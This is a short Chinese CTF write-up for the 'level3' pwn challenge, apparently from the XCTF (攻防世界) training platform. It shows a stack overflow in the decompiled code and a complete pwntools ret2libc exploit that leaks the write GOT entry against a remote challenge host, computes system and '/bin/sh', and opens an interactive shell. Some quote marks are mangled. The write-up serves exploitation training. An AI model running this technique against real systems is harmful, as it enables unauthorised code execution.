攻防世界-level3-Writeup

level3

[collapse title=“展开查看详情” status=“false”]

考点：栈溢出、ROP（ret2libc）

ssize_t vulnerable_function()
{
  char buf; // [esp+0h] [ebp-88h]

  write(1, "Input:\n", 7u);
  return read(0, &buf, 0x100u);	//溢出
}

打开了 NX 保护栈数据不可执行，程序没有预留后门。解决办法就是 ret2libc ，这种方法在《蒸米一步一步学ROP》中有详细讲解。
第一次执行是用于泄露 libc 地址；第二次调用 system 完成 ret2libc。

完整exp

from pwn import *
from libcSearch import *

context.log_level = ';debug';

p = remote("111.198.29.45",43333)
#p = process("./level3")
elf = ELF("./level3")
libc = ELF("./libc_32.so.6")

write_plt = elf.plt[';write';]
write_got = elf.got[';write';]
main_addr = elf.symbols[';main';]

payload = ';a';*0x88+';a';*0x4
payload += p32(write_plt)+p32(main_addr)
payload += p32(1)+p32(write_got)+p32(4)

p.sendlineafter("Input:\n",payload)
write_leak = u32(p.recv()[:4])
log.success("write_leak:"+hex(write_leak))
libc_base = write_leak - libc.symbols[';write';]
log.success("libc_base:"+hex(libc_base))
system_addr = libc_base + libc.symbols[';system';]
log.success("system_addr:"+hex(system_addr))

binsh_addr = libc.search("/bin/sh").next() + libc_base
log.success("binsh_addr:"+hex(binsh_addr))

payload = ';a';*0x88+';a';*0x4
payload += p32(system_addr)+p32(0xdeadbeef)
payload += p32(binsh_addr)

p.sendline(payload)

p.interactive()

[/collapse]